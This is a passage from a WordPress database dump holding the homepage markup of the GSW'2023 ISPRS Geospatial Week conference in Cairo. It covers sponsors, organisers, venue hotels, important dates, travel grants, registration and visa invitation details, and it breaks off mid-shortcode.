(4647,1,'2023-06-09 14:22:40','2023-06-09 14:22:40','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317489572{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your name (as it appears in your passport), passport number and nationality.</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" 